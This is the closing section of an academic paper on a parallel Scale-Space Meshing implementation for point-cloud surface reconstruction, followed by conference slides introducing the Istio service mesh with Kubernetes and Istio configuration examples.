and we copy the same paragraphs below for completeness. As a matter of fact, if the number of iterations is set to 0, the algorithm is exactly equivalent to the Ball Pivoting Algorithm with a single radius. 6.1 Dependencies The code provided is a stand-alone C++ code, available at http://dx.doi.org/10.5201/ipol.2015.102. It uses the C++ standard template library extensively. The user can choose between the single-threaded implementation and its parallel version. The single-threaded version does not rely on any external libraries. The parallelization is done through OpenMP\(^2\), a standard API for shared memory multiprocessing programming. The code was tested successfully on Ubuntu 14.04 with g++4.8, and on MacOS 10.8 using g++4.8.0. The compilation is done through the CMake build system to be cross-platform. The code compiles with g++ and with clang, but there is no support yet for OpenMP with the clang compiler, so that the parallelism is deactivated in that case. 6.2 Integration in a Larger Project The code is templated and the structures are kept as simple as possible in order for a better integration into different C++ projects. In particular, it should be easy to interface it with the CGAL library [7] and thus benefit from CGAL geometry kernels. Nevertheless, the goal here is to have a stand-alone code, avoiding the need to link against such a heavy library as CGAL. 6.3 Numerical Robustness The current implementation relies heavily on geometric tests (e.g. to know whether a point lies within a sphere given by a point and a radius, to know if a point lies on the right side of a potential triangle...). These problems are known to generate numerical robustness problems potentially dramatic for global structures such as Delaunay. A solution to that problem is to use exact arithmetic, which is very time-consuming. An alternative is to use robust arithmetic through robust predicates (i.e. predicates that will give consistent results) as described in [12]. Yet in our case the consequences of not using any robust predicates are not so dramatic since the construction of the mesh is incremental and local. A numerical instability will only affect the choice of a particular triangle instead of another but will not create global artifacts. 7 Experiments The first example (Figure 3) is precisely the one that was presented as a failure case for the Ball Pivoting Algorithm (BPA)[3]. The goal is indeed to interpolate a noisy point cloud and in that case \(^2\)The OpenMP API specification for parallel programming. http://openmp.org neither the single-radius BPA nor the multiple radius version succeed in recovering a closed interpo- lating mesh. In comparison the Scale-Space Meshing Algorithm recovers a closed mesh interpolating exactly the input noisy point set, allowing for a visual quality assessment of the shape reconstruction. Figure 4 shows the result of the Scale-Space Meshing Algorithm on some well-known shapes from the Stanford repository, showing that the method works in standard cases. Figure 3: A noisy sphere reconstructed by the Ball Pivoting Algorithm (BPA) and Scale-Space Meshing Algorithm (SSM). Only the Scale-Space Meshing (right) allows for the reconstruction of a closed interpolating mesh (30000 vertices, 60000 facets). Figure 4: Results of the Scale-Space Meshing algorithm on some standard shapes: the Stanford Bunny (left, \( r = 0.0005, N = 4 \)) and the Stanford Dragon (right, \( r = 0.0005, N = 4 \)). One can also judge the interpolating quality of the mesh by comparing the number of vertices to the number of input points. For the pyramid point set (Figure 6) for example, the Scale-Space Meshing Algorithm builds a mesh with 99.24% of the input point set as vertices compared to only 79.36% for the Ball Pivoting Algorithm. Figures 3 and 5 provide comparisons of the Scale-Space Meshing and the Ball Pivoting Algorithms with the exact same meshing radius. In particular, Figure 5 shows that the details are much better preserved with the Scale-Space meshing Algorithm. Figure 6 shows the shape evolution of a pyramid point set [4] with respect to the scale. The shape loses its details and becomes smoother: as a consequence, computations done at the low scale will be more robust than those done at the highest scales. The result of the processing thus strongly depends on the choice of the scale. Finally, we show the performance of the Scale-Space Meshing using various input shapes from the Farman dataset [4]. Figure 7 shows the coarse and fine scale meshes built from cropped point clouds from the Farman dataset [4]. 8 Conclusion This paper presented the parallel implementation of the scale-space meshing algorithm, a method to build an interpolating mesh for point sets containing possibly details and sharp features as well as noise. The code for this implementation is available for download and online tests (http://dx.doi.org/10.5201/ipol.2015.102). Acknowledgments This work was partially funded by Direction Générale de l’Armement, Office of Naval Research (Grant N00014-97-1-0839) and the European Research Council (ERC Advanced Grant “Twelve Labours”). Data Credits The Stanford Bunny and Stanford Dragon (Figure 4) are from the Stanford 3D Scanning Repository\textsuperscript{3}. The other shapes (Figures 5, 6 and 7) are from the Farman Institute 3D Point Sets\textsuperscript{4}. \textsuperscript{3}http://graphics.stanford.edu/data/3Dscanrep/ \textsuperscript{4}http://www.ipol.im/pub/art/2011/dalmm_ps/ An Implementation and Parallelization of the Scale-Space Meshing Algorithm Figure 6: Evolution of a shape with the scale-space References Figure 7: The coarse and fine scale meshes produced by the Scale-Space Meshing algorithm applied to datasets of the Farman data set, the parameters used are: $r = 0.2$ (Girl with Crotales), $r = 0.16$ (Brasempouy), $r = 0.2$ (logo), $r = 0.1$ (Anubis). In all the experiments, $N = 4$. NB: these pointsets are not subsampled or normalized as the ones proposed in the demo.
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-01238790/file/article.pdf", "len_cl100k_base": 7634, "olmocr-version": "0.1.48", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 36583, "total-output-tokens": 9713, "length": "2e12", "weborganizer": {"__label__adult": 0.00039887428283691406, "__label__art_design": 0.001617431640625, "__label__crime_law": 0.0004472732543945313, "__label__education_jobs": 0.0011577606201171875, "__label__entertainment": 0.00012946128845214844, "__label__fashion_beauty": 0.0002887248992919922, "__label__finance_business": 0.0003142356872558594, "__label__food_dining": 0.0004453659057617187, "__label__games": 0.0009002685546875, "__label__hardware": 0.0021419525146484375, "__label__health": 0.0008840560913085938, "__label__history": 0.0010128021240234375, "__label__home_hobbies": 0.0002777576446533203, "__label__industrial": 0.0010347366333007812, "__label__literature": 0.0003871917724609375, "__label__politics": 0.00036025047302246094, "__label__religion": 0.0007967948913574219, "__label__science_tech": 0.4794921875, "__label__social_life": 0.00013947486877441406, "__label__software": 0.01342010498046875, "__label__software_dev": 0.49267578125, "__label__sports_fitness": 0.0003910064697265625, "__label__transportation": 0.0008497238159179688, "__label__travel": 0.0003349781036376953}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35282, 0.03411]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35282, 0.5908]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35282, 0.84858]], "google_gemma-3-12b-it_contains_pii": [[0, 978, false], [978, 3340, null], [3340, 7161, null], [7161, 10339, null], [10339, 14521, null], [14521, 17244, null], [17244, 19811, null], [19811, 22781, null], [22781, 26006, null], [26006, 29003, null], [29003, 30631, null], [30631, 31951, null], [31951, 33489, null], [33489, 33862, null], [33862, 35282, null]], "google_gemma-3-12b-it_is_public_document": [[0, 978, true], [978, 3340, null], [3340, 7161, null], [7161, 10339, null], [10339, 14521, null], [14521, 17244, null], [17244, 19811, null], [19811, 22781, null], [22781, 26006, null], [26006, 29003, null], [29003, 30631, null], [30631, 31951, null], [31951, 33489, null], [33489, 33862, null], [33862, 35282, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35282, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35282, null]], "pdf_page_numbers": [[0, 978, 1], [978, 3340, 2], [3340, 7161, 3], [7161, 10339, 4], [10339, 14521, 5], [14521, 17244, 6], [17244, 19811, 7], [19811, 22781, 8], [22781, 26006, 9], [26006, 29003, 10], [29003, 30631, 11], [30631, 31951, 12], [31951, 33489, 13], [33489, 33862, 14], [33862, 35282, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35282, 0.02643]]}
olmocr_science_pdfs
2024-11-24
2024-11-24
bd599fc54c8114b0017711922a2aa5aff16b6758
Service Mesh from the Ground Up: How Istio Can Transform Your Organization Megan O'Keefe oreilly.com/sacon | #OReillySACon Hello! ☁️ I'm a Developer Relations Engineer at Google Cloud. 💕 I help make Google's products easy to adopt and use. 💻 I test-drive new features, build demos/tools/workshops, and talk to end-users. ☸️ I work on: Kubernetes, Service Mesh, and Anthos. Today's Goals The world of distributed applications Why use a service mesh? Istio feature tour Live demos! Q&A Why Service Mesh? The increasing adoption of containers, microservices, and hybrid cloud deployments has created more distributed applications than ever. Distributed apps can be defined as a collection of services. What is a Service? A **Service** is one deployable unit of software. A Service implements a specific set of **business logic**, and is often owned by one team. A Service can run and **scale** independently from its dependencies. A Service can be **small** or **large**. A Service can be **stateless** or **stateful**. Services: Benefits - Separation of concerns - Abstract away infrastructure - Faster deployments - Scale independently - Cost savings How do your **developers** and **operators** keep things up and running with explosive growth in number of services? By thinking **services first**: investing in **automation**, **tools**, and **cultural change**. This is not easy. Services: Challenges - More languages, client libraries - Choosing an environment - Lifecycling Applications - Scaling to demand - Resource optimization What can Kubernetes do? - Multitenancy, Isolation - Abstract away compute - Keep containers alive - Automated scaling - Optimize resources Kubernetes runs **Pods (Workloads)** in a **Cluster**. A **Cluster** = a set of Virtual Machines (**Nodes**) Cluster - master - node - node - node Pods in a Cluster Pods in a Cluster you → master → Pods apiVersion: apps/v1 class: Deployment metadata: name: hello-world spec: replicas: 1 template: metadata: labels: app: hello-world spec: containers: - name: hello-world-server image: gcr.io/megangcp/helloworld:v0.0.1 ports: - containerPort: 8080 apiVersion: v1 kind: Service metadata: name: helloworld spec: selector: app: hello-world ports: - name: http protocol: TCP port: 80 targetPort: 8080 type: LoadBalancer kubectl apply -f deployment.yaml deployment.extensions/hello-world created kubectl get pods <table> <thead> <tr> <th>NAME</th> <th>READY</th> <th>STATUS</th> <th>RESTARTS</th> </tr> </thead> <tbody> <tr> <td>hello-world-84c646556b-kn59b</td> <td>1/1</td> <td>Running</td> <td>0</td> </tr> </tbody> </table> ```bash kubectl get svc ``` <table> <thead> <tr> <th>NAME</th> <th>TYPE</th> <th>CLUSTER-IP</th> <th>EXTERNAL-IP</th> </tr> </thead> <tbody> <tr> <td>helloworld</td> <td>LoadBalancer</td> <td>10.51.246.3</td> <td>35.188.110.209</td> </tr> </tbody> </table> ➜ curl http://35.188.110.209 Hello world! But... Where does Kubernetes fall short? - Safe Rollouts - Observability - Traffic Encryption - Request-level Authorization - Resilience What is a Service Mesh? A **transparent layer** on top of your services. A way to make the **network** aware of application protocols like HTTP and gRPC. An **observability** tool A **security** tool. Why use a Service Mesh? - Decouple Dev from Ops - Separate applications from infrastructure - Get generated metrics without instrumenting your services - Manage security policies in one place - Modify traffic flow without changing app code What is Istio? Istio An open-source service mesh tool to manage service interactions across container and VM-based services. Created by Google, IBM, and Lyft in 2017 Runs on Kubernetes Works at the application layer (Layer 7: HTTP, gRPC) Today: 300+ organizations contributing Istio Connect, secure, control, and observe services. Connect Intelligently control the flow of traffic and API calls between services, conduct a range of tests, and upgrade gradually with red/black deployments. Secure Automatically secure your services through managed authentication, authorization, and encryption of communication between services. Control Apply policies and ensure that they're enforced, and that resources are fairly distributed among consumers. Observe See what's happening with rich automatic tracing, monitoring, and logging of all your services. What Does Istio Do? - Observability - Network Automation - Security What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph - Safe rollouts with traffic splitting - Client-side load balancing - Timeouts, retry, circuit-breaking What Does Istio Do? - Telemetry for every service - Logs for all traffic - Service graph - Safe rollouts with traffic splitting - Client-side load balancing - Timeouts, retry, circuit-breaking - Encryption in transit - Service identity, authentication - Authorization Who is Istio for? **Infrastructure Operators:** Monitor traffic across clusters and regions, add failover **Platform Engineers:** Build CI/CD tools for app developers, migrate legacy services **App Developers:** Investigate service metrics and behavior, debug during outages **Security Admins:** Enforce authentication and authorization policies **Quality Assurance:** Mirror production traffic to a test environment Istio Partners IBM Cloud Solo AspenMesh Envoy Knative Cisco Datadog WeaveWorks Palo Alto Networks more at: istio.io/about/community/partners/ | image source: Datadog Istio a Game Changer for HP's FitStation Platform How HP is building its next-generation footwear personalization platform on Istio BY STEVEN CEUPPENS, CHIEF SOFTWARE ARCHITECT @ HP FITSTATION, OPEN SOURCE ADVOCATE & CONTRIBUTOR | JULY 31, 2018 | 2 MINUTE READ This blog post was written assuming Istio 1, so some of this content may now be outdated. The FitStation team at HP strongly believes in the future of Kubernetes, BPF and service-mesh as the next standards in cloud infrastructure. We are also very happy to see Istio coming to its official Istio 1.0 release – thanks to the joint collaboration that started at Google, IBM and Lyft beginning in May 2017. more at: istio.io/about/community/customers/ Case Study: Autotrader Adopting Kubernetes led to a 75 percent reduction in compute resources. Adopting Istio led to improved security and visibility, with no extra developer effort or training needed. Istio's service metrics improved visibility across a large microservices architecture. source: Google Cloud Blog How Istio Works Node Agent Service A Proxy Node Agent Service B Proxy Policy checks and telemetry Discovery & config data to proxies Mixer TLS certs to node agents Pilot Galley Citadel Mesh config to control plane TLS certs to proxies via Secrets YAML Sidecar configuration to Pods Istio Control Plane Node Agent Service A Proxy Service B Proxy Node Agent Pilot Galley Citadel Mixer Policy checks and telemetry Discovery & config data to proxies TLS certs to proxies via Secrets TLS certs to node agents Mesh config to control plane Sidecar configuration to Pods YAML Istio Control Plane Injectors Discovery & config data to proxies Policy checks and telemetry Mesh config to control plane Sidecar configuration to Pods Node **Agent** **Service A** **Proxy** Node **Agent** **Service B** **Proxy** --- **Discovery & config data to proxies** **Mesh config to control plane** **Sidecar configuration to Pods** **Policy checks and telemetry** **YAML** **Mixer** **Pilot** **Galley** **Citadel** **Injector** --- **TLS certs to node agents** **TLS certs to proxies via Secrets** --- **Istio Control Plane** Node Agent Service A Proxy Node Agent Service B Proxy Discovery & config data to proxies Policy checks and telemetry Mesh config to control plane Sidecar configuration to Pods TLS certs to node agents TLS certs to proxies via Secrets YAML Pilot Galley Citadel Injectors Istio Control Plane Node Agent Service A Proxy Node Agent Service B Proxy Pilot Galley Citadel Injectors Mesh config to control plane Sidecar configuration to Pods Discovery & config data to proxies Policy checks and telemetry TLS certs to node agents TLS certs to proxies via Secrets Istio Control Plane YAML Policy checks and telemetry Node **Agent** ![Service A] - Proxy Node **Agent** ![Service B] - Proxy **Discovery & config data to proxies** **Policy checks and telemetry** **Mixer** - **Pilot** - **Galley** - **Citadel** - **Inject** - **Sidecar configuration to Pods** **TLS certs to proxies via Secrets** **TLS certs to node agents** **YAML** **Istio Control Plane** Node - Agent Service A - Proxy Service B - Proxy TLS certs to proxies via Secrets Policy checks and telemetry Discovery & config data to proxies Mixer Pilot Galley Citadel Mesh config to control plane Injector Sidecar configuration to Pods YAML Istio Control Plane Installing Istio Demo Questions? Observability Observability is a measure of how well internal states of a system can be inferred from knowledge of its external outputs. Istio Observability Features **Service graph** - track dependencies at **runtime** Bird's eye view of service behavior for issue triage, reduce time to **detect and fix outages** Automatically collects the "golden signals" for every service - **latency, error rate, throughput** Set, monitor and enforce **Service-Level Objectives (SLOs)** **Tracing:** track a request from end to end, across service boundaries Demo Security Moving from VMs to Kubernetes introduces new security challenges. <table> <thead> <tr> <th>Virtual Machines</th> <th>Kubernetes</th> </tr> </thead> <tbody> <tr> <td>Isolation at the <strong>host level</strong></td> <td>Containers <strong>share</strong> a host (Node)</td> </tr> <tr> <td>Workloads allocated to hosts</td> <td>Nodes work as <strong>one</strong> virtual host</td> </tr> <tr> <td>Workloads <strong>share</strong> OS, dependencies</td> <td>Containers have <strong>own dependencies</strong></td> </tr> <tr> <td><strong>Stable</strong> host IPs</td> <td><strong>Ephemeral</strong> Pod IPs</td> </tr> <tr> <td>May run in a <strong>trusted</strong>, on-prem environment</td> <td>May run in a <strong>cloud</strong> environment</td> </tr> </tbody> </table> Istio - Security Automatically secure your services through managed authentication, authorization, and encryption of communication between services. - Traffic encryption - Service auth - Auditing controls - Access policies Demo: Mutual TLS Node - Agent - Service A - Proxy Node - Agent - Service B - Proxy Node - Pilot - Galley - Citadel - Mixer YAML - Mesh config to control plane - Sidecar configuration to Pods - Discovery & config data to proxies - TLS certs - TLS certs to node agents - Policy checks and telemetry MeshPolicy apiVersion: "authentication.istio.io/v1alpha1" kind: "MeshPolicy" metadata: name: "default" spec: peers: - mtls: {}/ DestinationRule apiVersion: "networking.istio.io/v1alpha3" kind: "DestinationRule" metadata: name: "default" namespace: "istio-system" spec: host: "*.local" trafficPolicy: tls: mode: ISTIO_MUTUAL Demo: Authorization Node Agent Service A Proxy Service B Proxy Node Agent TLS certs to proxies via Secrets Pilot Galley Citadel Mesh config to control plane TLS certs to node agents YAML Pilot Galley Citadel Inject Sidecar configuration to Pods Istio Control Plane Discovery & config data to proxies Policy checks and telemetry TLS certs to node agents Mesh config to control plane Sidecar configuration to Pods YAML AuthorizationPolicy apiVersion: "security.istio.io/v1beta1" kind: "AuthorizationPolicy" metadata: name: "currency-policy" namespace: default spec: selector: matchLabels: app: currency-service rules: - from: - source: principals: ["cluster.local/ns/default/sa/frontend-sa"] Questions? DevOps DevOps is an organizational and cultural movement that aims to increase software delivery *velocity*, improve service *reliability*, and build *shared ownership* among software stakeholders. [cloud.google.com/devops](http://cloud.google.com/devops) What is DevOps? - design - plan - release - deploy - build - test - monitor - operate DEV OPS Google Cloud DevOps is an organizational and cultural movement that aims to increase software delivery velocity, improve service reliability, and build shared ownership among software stakeholders. cloud.google.com/devops DevOps with **Istio** **Velocity:** safe rollouts with traffic *splitting*. deprecate legacy services with *redirects*. accelerate the customer feedback loop with *A/B testing*. **Reliability:** set SLOs and alerts on generated metrics. use *circuit breaking* and *fault injection* to harden services. **Shared ownership:** declarative traffic/security policies in a *shared Git repo*. scope Istio policies at the *namespace* level. Istio - Traffic Management VirtualService, Gateway, DestinationRule, and ServiceEntry - Traffic splitting - Traffic steering - Circuit breaking - Egress control - Fault injection VirtualService apiVersion: networking.istio.io/v1alpha3 class: VirtualService metadata: name: frontend spec: hosts: - "frontend.default.svc.cluster.local" http: - route: - destination: host: frontend Gateway ```yaml apiVersion: networking.istio.io/v1alpha3 kind: Gateway metadata: name: frontend-gateway spec: selector: istio: ingressgateway servers: - port: number: 80 name: http protocol: HTTP hosts: - "*" ``` apiVersion: networking.istio.io/v1alpha3 class: DestinationRule metadata: name: frontend spec: host: frontend.default.svc.cluster.local subsets: - name: v1 labels: version: v1 - name: v2 labels: version: v2 Kubernetes Deployment Pods Pods Kubernetes Service Kubernetes Deployment Pods Pods Pods Kubernetes Deployment v1 Pods v2 Kubernetes Deployment v2 Kubernetes Service DestinationRule <table> <thead> <tr> <th>Pods</th> <th>Pods</th> </tr> </thead> <tbody> <tr> <td>v1</td> <td>v2</td> </tr> </tbody> </table> VirtualService Kubernetes Service DestinationRule Pods v1 Pods v2 VirtualService Kubernetes Service DestinationRule Pods v1 Pods v2 Demo: Service Redirect Service Redirect Scenario - we've moved to a faster payments service, coolcash. We want to deprecate paymentservice and redirect calls to coolcash. DEV OPS design plan release build monitor operate deploy Demo: Canary Deployment Canary Deployment - Release new service versions without worrying about ops challenges - Goal: progressively direct traffic to the new frontend v2 Diagram: - Loadgen - Frontend - v1 (80%) - v1 - v1 - v2 (20%) Demo: A/B Testing A/B Testing **Goal:** Determine which frontend layout results in the most revenue Requests with `ab-selected:true` HTTP reader are routed to v2. Combining Traffic Rules http: - match: # RULE 1 - ADD HEADER - uri: prefix: "/article/breaking-news" route: - destination: host: articles headers: response: add: no-cache: "true" timeout: 2s - match: # RULE 2 - URI REWRITE - uri: prefix: /blog rewrite: uri: /beta/blog route: - destination: host: articles timeout: 2s - route: # RULE 3 - DEFAULT / TIMEOUT - destination: host: articles timeout: 2s weight: 100 Resilience What makes an application resilient? Downstream services **fail gracefully** when an upstream service is unavailable. **Timeouts** and **retry** logic to prevent a service waiting forever for an upstream. **Failover policies** to another region running the same service. Istio Resilience Features ⏰ Timeouts and retry logic ⚡ Circuit breaking 🚧 Fault injection 🚫 Client-side load balancing 🌍 Locality load balancing / Regional failover Demo: Circuit Breaking Circuit Breaking - Closed - Success - Fail Under Threshold - Too many failures - Open - Fail Fast - Timeout - Half Open - Success - Failure image source: Banzai Cloud Circuit Breaking Avoid cascading failures through multiple services Istio circuit breaker: 1. detect $x$ consecutive failures 2. trip the circuit breaker 3. **fail immediately** for $t$ seconds Demo: Fault Injection Fault Injection Chaos testing - detect how downstream services respond when upstream services fail Find weak spots in application code error handling Istio supports error and timeout faults. Wrap-Up Where does Kubernetes fall short? - Safe Rollouts - Observability - Traffic Encryption - Request-level Authorization - Resilience How can **Istio** transform your organization? How can Istio transform your organization? - Fast, Safe Releases - Complete Observability - End-to-end Encryption - Request-level Authorization - Failure Prediction, Reaction By tracking service dependencies, revealing organizational structure. By **decoupling the network** from your app code. By handling north-south and east-west traffic with the **same APIs**. By allowing developers to focus on building **features**, driving **business value**. By giving you total **visibility** into service interactions. By accelerating the **DevOps feedback loop**. By hardening your applications, **reducing the risk of outages**. How do your **developers** and **operators** keep things up and running with explosive growth in number of services? By thinking **services first**: investing in **automation**, **tools**, and **cultural change**. How can **Istio** transform your organization? Through telemetry, uniformity, and automation. Adopting Istio is a **journey**. Istio Adoption Checklist ✅ **Who** will adopt Istio? (Which product teams? Which services? Will there be phases of adoption across your org?) ✅ **What features** to adopt? What will come first? ✅ **How to configure Istio?** One cluster per control plane? Multicluster? VMs? ✅ **Where** will you keep your Istio YAML? How will you roll out policy? ✅ **Plan ahead for Istio's costs** - time (sidecar latency) and money (CPUs) ✅ **How** will you upgrade Istio? How many versions behind? **Best Practices** 1. Put an Istio control plane where your applications live. 2. Keep your Istio policies in a Git repo 3. Use `istioctl analyze` to detect bad config 4. Create a "default" VirtualService & DestinationRule for every service 5. Use Kubernetes namespaces for isolation More at: [istio.io/docs/ops/best-practices](https://istio.io/docs/ops/best-practices) What we didn't cover VM workloads Multicluster Service mesh vs. API gateway Secure ingress JWT authentication Egress traffic control New features - istiod, Mixer v2 Resources istio.io istiobyexample.dev bit.ly/istio-samples bit.ly/istio-sacon Thank you! Cyberconflict: A new era of war, sabotage, and fear 9:15am-10:10am Wednesday, March 27, 2019 Location: Ballroom Secondary topics: Security and Privacy Rate this session We're living in a new era of constant sabotage, misinformation, and fear, in which everyone is a target, and you're often the collateral damage in a growing conflict among states. From crippling infrastructure to sowing discord and doubt, cyber is now the weapon of choice for democracies, dictators, and terrorists. David Sanger explains how the rise of cyberweapons has transformed geopolitics like nothing since the invention of the atomic bomb. Moving from the White House Situation Room to the dens of Chinese, Russian, North Korean, and Iranian hackers to the boardrooms of Silicon Valley, David reveals a world coming face-to-face with the perils of technological revolution—a conflict that the United States helped start when it began using cyberweapons against Iranian nuclear plants and North Korean missile launches. But now we find ourselves in a conflict we're uncertain how to control, as our adversaries exploit vulnerabilities in our hyperconnected nation and we struggle to figure out how to deter these complex, short-of-war attacks. David Sanger The New York Times David E. Sanger is the national security correspondent for the New York Times as well as a national security and political contributor for CNN and a frequent guest on CBS This Morning, Face the Nation, and many PBS shows. Appendix Istio Service mesh tool Open Source Istio APIs Prometheus, Grafana, Jaeger Control plane runs on your cluster Anthos Service Mesh Service mesh tool Google Product Istio APIs Google Cloud Monitoring, Tracing Control plane managed outside your cluster Works on GCP, AWS, on-prem SRE dashboards, alerts built in Security insights + recommendations
{"Source-Url": "https://cdn.oreillystatic.com/en/assets/1/event/307/Service%20mesh%20from%20the%20ground%20up_%20How%20Istio%20can%20transform%20your%20organization%20Presentation.pdf", "len_cl100k_base": 5222, "olmocr-version": "0.1.53", "pdf-total-pages": 135, "total-fallback-pages": 0, "total-input-tokens": 141651, "total-output-tokens": 9920, "length": "2e12", "weborganizer": {"__label__adult": 0.0002846717834472656, "__label__art_design": 0.0004611015319824219, "__label__crime_law": 0.0006136894226074219, "__label__education_jobs": 0.0009260177612304688, "__label__entertainment": 0.00012695789337158203, "__label__fashion_beauty": 0.00012624263763427734, "__label__finance_business": 0.0008935928344726562, "__label__food_dining": 0.0002034902572631836, "__label__games": 0.0004351139068603515, "__label__hardware": 0.001407623291015625, "__label__health": 0.00025153160095214844, "__label__history": 0.0001885890960693359, "__label__home_hobbies": 8.600950241088867e-05, "__label__industrial": 0.00034427642822265625, "__label__literature": 0.0001786947250366211, "__label__politics": 0.0005822181701660156, "__label__religion": 0.00024437904357910156, "__label__science_tech": 0.042236328125, "__label__social_life": 0.0001838207244873047, "__label__software": 0.09820556640625, "__label__software_dev": 0.8515625, "__label__sports_fitness": 0.00015652179718017578, "__label__transportation": 0.0002968311309814453, "__label__travel": 0.00014293193817138672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20625, 0.01163]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20625, 0.09851]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20625, 0.78261]], "google_gemma-3-12b-it_contains_pii": [[0, 124, false], [124, 378, null], [378, 490, null], [490, 508, null], [508, 644, null], [644, 705, null], [705, 1027, null], [1027, 1161, null], [1161, 1278, null], [1278, 1375, null], [1375, 1393, null], [1393, 1547, null], [1547, 1547, null], [1547, 1687, null], [1687, 1797, null], [1797, 1836, null], [1836, 1854, null], [1854, 1893, null], [1893, 2169, null], [2169, 2363, null], [2363, 2439, null], [2439, 2653, null], [2653, 2880, null], [2880, 2923, null], [2923, 2930, null], [2930, 3061, null], [3061, 3266, null], [3266, 3507, null], [3507, 3522, null], [3522, 3789, null], [3789, 4364, null], [4364, 4433, null], [4433, 4523, null], [4523, 4717, null], [4717, 4988, null], [4988, 5410, null], [5410, 5578, null], [5578, 6293, null], [6293, 6612, null], [6612, 6612, null], [6612, 6628, null], [6628, 6933, null], [6933, 7249, null], [7249, 7374, null], [7374, 7780, null], [7780, 8089, null], [8089, 8427, null], [8427, 8427, null], [8427, 8427, null], [8427, 8791, null], [8791, 8791, null], [8791, 8791, null], [8791, 9073, null], [9073, 9073, null], [9073, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9095, null], [9095, 9106, null], [9106, 9120, null], [9120, 9243, null], [9243, 9660, null], [9660, 9665, null], [9665, 9674, null], [9674, 9740, null], [9740, 10249, null], [10249, 10474, null], [10474, 10491, null], [10491, 10782, null], [10782, 10919, null], [10919, 11134, null], [11134, 11154, null], [11154, 11577, null], [11577, 11923, null], [11923, 11934, null], [11934, 11941, null], [11941, 12191, null], [12191, 12304, null], [12304, 12514, null], [12514, 12950, null], [12950, 13131, null], [13131, 13360, null], [13360, 13608, null], [13608, 13845, null], [13845, 13884, null], [13884, 13941, null], [13941, 14004, null], [14004, 14089, null], [14089, 14089, null], [14089, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14245, null], [14245, 14394, null], [14394, 14454, null], [14454, 14478, null], [14478, 14697, null], [14697, 14697, null], [14697, 14715, null], [14715, 14715, null], [14715, 14862, null], [14862, 15359, null], [15359, 15370, null], [15370, 15644, null], [15644, 15810, null], [15810, 15833, null], [15833, 16018, null], [16018, 16214, null], [16214, 16236, null], [16236, 16430, null], [16430, 16438, null], [16438, 16569, null], [16569, 16616, null], [16616, 16792, null], [16792, 17248, null], [17248, 17365, null], [17365, 17462, null], [17462, 17509, null], [17509, 17556, null], [17556, 17589, null], [17589, 18079, null], [18079, 18498, null], [18498, 18664, null], [18664, 18724, null], [18724, 18743, null], [18743, 18754, null], [18754, 20269, null], [20269, 20278, null], [20278, 20278, null], [20278, 20278, null], [20278, 20625, null]], "google_gemma-3-12b-it_is_public_document": [[0, 124, true], [124, 378, null], [378, 490, null], [490, 508, null], [508, 644, null], [644, 705, null], [705, 1027, null], [1027, 1161, null], [1161, 1278, null], [1278, 1375, null], [1375, 1393, null], [1393, 1547, null], [1547, 1547, null], [1547, 1687, null], [1687, 1797, null], [1797, 1836, null], [1836, 1854, null], [1854, 1893, null], [1893, 2169, null], [2169, 2363, null], [2363, 2439, null], [2439, 2653, null], [2653, 2880, null], [2880, 2923, null], [2923, 2930, null], [2930, 3061, null], [3061, 3266, null], [3266, 3507, null], [3507, 3522, null], [3522, 3789, null], [3789, 4364, null], [4364, 4433, null], [4433, 4523, null], [4523, 4717, null], [4717, 4988, null], [4988, 5410, null], [5410, 5578, null], [5578, 6293, null], [6293, 6612, null], [6612, 6612, null], [6612, 6628, null], [6628, 6933, null], [6933, 7249, null], [7249, 7374, null], [7374, 7780, null], [7780, 8089, null], [8089, 8427, null], [8427, 8427, null], [8427, 8427, null], [8427, 8791, null], [8791, 8791, null], [8791, 8791, null], [8791, 9073, null], [9073, 9073, null], [9073, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9090, null], [9090, 9095, null], [9095, 9106, null], [9106, 9120, null], [9120, 9243, null], [9243, 9660, null], [9660, 9665, null], [9665, 9674, null], [9674, 9740, null], [9740, 10249, null], [10249, 10474, null], [10474, 10491, null], [10491, 10782, null], [10782, 10919, null], [10919, 11134, null], [11134, 11154, null], [11154, 11577, null], [11577, 11923, null], [11923, 11934, null], [11934, 11941, null], [11941, 12191, null], [12191, 12304, null], [12304, 12514, null], [12514, 12950, null], [12950, 13131, null], [13131, 13360, null], [13360, 13608, null], [13608, 13845, null], [13845, 13884, null], [13884, 13941, null], [13941, 14004, null], [14004, 14089, null], [14089, 14089, null], [14089, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14222, null], [14222, 14245, null], [14245, 14394, null], [14394, 14454, null], [14454, 14478, null], [14478, 14697, null], [14697, 14697, null], [14697, 